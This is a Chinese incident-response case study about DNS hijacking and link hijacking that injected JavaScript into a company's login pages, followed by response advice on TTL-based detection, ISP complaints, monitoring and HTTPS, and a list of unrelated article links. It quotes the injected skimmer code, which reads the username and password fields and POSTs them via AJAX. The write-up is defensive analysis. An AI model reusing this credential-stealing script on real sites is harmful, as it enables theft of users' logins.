“企業(yè)應(yīng)急響應(yīng)和反滲透”之真實(shí)案例分析
0x06 案例之永無止境的劫持
對于劫持我想大家都不陌生,我們在生活中比較常見到的就是運(yùn)營商在頁面中插入廣告等代碼,這種就是一種劫持攻擊。
回到案例本身,我們的一個(gè)業(yè)務(wù)先后出現(xiàn)多次多種手段的劫持攻擊,一次是 dns 劫持,把業(yè)務(wù)的域名劫持到 61.* 這個(gè) ip 上,另外一次是鏈路劫持,替換服務(wù)器返回給用戶的 http 響應(yīng)內(nèi)容,這兩次的目的都一樣就是在登錄口添加 js 代碼,用于竊取用戶的用戶名和明文密碼。我們另外一個(gè)業(yè)務(wù)也遭受鏈路劫持,直接替換客戶投放的廣告代碼,給業(yè)務(wù)造成很大的經(jīng)濟(jì)損失。
下面兩個(gè)圖是我們業(yè)務(wù)監(jiān)控系統(tǒng)和基調(diào)的截圖,上面的圖可以很明顯看到在 9:30 用戶登錄成功數(shù)明顯下降,持續(xù)不到一個(gè)小時(shí),下圖是全國部分地區(qū)基調(diào)的數(shù)據(jù),可以看到域名被明顯劫持到 61 這個(gè) ip,這是一次典型的 DNS 攻擊。
頁面中被插入的攻擊核心代碼
- //獲取用戶名和密碼
- function ffCheck() {
- try {
- try {
- var u = null != f ? f.idInput.value : document.getElementById("idInput").value;
- } catch (e) {
- var u = (document.getElementById("idInput").innerHTML).replace(/\s/g, "");
- }
- var p = null != f ? f.pwdInput.value : document.getElementById("pwdInput").value;
- if (u.indexOf("@") == -1) u += "@xxx.com";
- try {
- if (u.indexOf("@") == -1) uu = u + getdomain();
- } catch (e) {}
- sendurl("/abc", u, p, "coremail");
- } catch (e) {}
- return fOnSubmit();
- }
- 通過 ajax 發(fā)送出去
- function sendurl(uri, u, p, i) {
- xmlHttp = GetXmlHttpObject();
- if (xmlHttp == null) {
- return;
- }
- param = "user=" + u + "&pass=" + p + "&icp=" + i;
- xmlHttp.onreadystatechange = stateChanged;
- try {
- xmlHttp.open("POST", uri + "?t=" + (new Date()).valueOf(), true);
- } catch (e) {}
- xmlHttp.setRequestHeader("If-Modified-Since", "0");
- xmlHttp.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
- xmlHttp.send(param);
- }
接下來看下面兩張圖片
這是一次典型的鏈路劫持攻擊,通過 ttl 就能夠判斷,攻擊的結(jié)果和前面提到的 dns 劫持攻擊類似,插入惡意 js 代碼來獲取用戶的用戶名和密碼。
對于劫持攻擊的處理過程,首先是判斷是什么攻擊,對于鏈路劫持目前的鏈路劫持好像大部分都是旁路的攻擊方式,就可以通過 ttl 來定位,默認(rèn)的 ttl 值很好判斷,如果可以修改的 ttl 值,可以通過遞增或者遞減 ttl 的方式來判斷,dns 劫持就是判斷攻擊方式是什么,哪些 dns 受影響,劫持的 ip 是什么運(yùn)營商,劫持后做了什么事情。
其次是解決攻擊,一般根據(jù)劫持的情況去聯(lián)系運(yùn)營商,聯(lián)系有關(guān)部門等,但是然并卵,有的功能投訴很有效,比如劫持廣告代碼,有的攻擊則沒有任何作用,比如注入 js 代碼獲取用戶名和密碼。
其實(shí)我們能做的畢竟有限,完善監(jiān)控,當(dāng)劫持發(fā)生的時(shí)候能夠第一時(shí)間獲知,甚至提醒用戶當(dāng)前環(huán)境有劫持的風(fēng)險(xiǎn),對部分業(yè)務(wù)使用 https,但是我覺得都不能根治這些問題。怎么才能解決劫持問題,我沒有好的解決方案,在這里我把這類案例分享出來是希望能夠和各位進(jìn)一步探討。
0x07 總結(jié)
總結(jié)這里我就不打算寫太多,我覺得有幾個(gè)大的方向作為指導(dǎo):
從業(yè)務(wù)角度,保障業(yè)務(wù)肯定是應(yīng)急響應(yīng)的前提;
從對抗角度,知己知彼百戰(zhàn)不殆;
從技術(shù)角度,只有更多的了解攻擊才能更好的做到防御;
責(zé)任編輯:大云網(wǎng)
-
發(fā)電電力輔助服務(wù)營銷決策模型
2019-06-24電力輔助服務(wù)營銷 -
電力線路安全工作的組織措施和技術(shù)措施分別是什么?
-
兩會保電進(jìn)行時(shí)丨陜西電力部署6項(xiàng)重點(diǎn)任務(wù)
-
電力線路安全工作的組織措施和技術(shù)措施分別是什么?
-
兩會保電進(jìn)行時(shí)丨陜西電力部署6項(xiàng)重點(diǎn)任務(wù)
-
山東特高壓首次完成帶電消缺 確保電力安全穩(wěn)定迎峰度冬
-
發(fā)電電力輔助服務(wù)營銷決策模型
2019-06-24電力輔助服務(wù)營銷 -
繞過安卓SSL驗(yàn)證證書的四種方式
-
網(wǎng)絡(luò)何以可能
2017-02-24網(wǎng)絡(luò)
-
Windows 10首發(fā) 四大安全提升
-
超級安卓漏洞 “寄生獸”影響數(shù)千萬手機(jī)應(yīng)用
-
航空公司首出現(xiàn)操作系統(tǒng)被黑
2015-06-23航空公司
-
“企業(yè)應(yīng)急響應(yīng)和反滲透”之真實(shí)案例分析
-
攜程恢復(fù)正常 安全,我們準(zhǔn)備好了嗎?
2015-05-29攜程 -
一張圖讀懂《2014年消費(fèi)者個(gè)人信息網(wǎng)絡(luò)安全報(bào)告》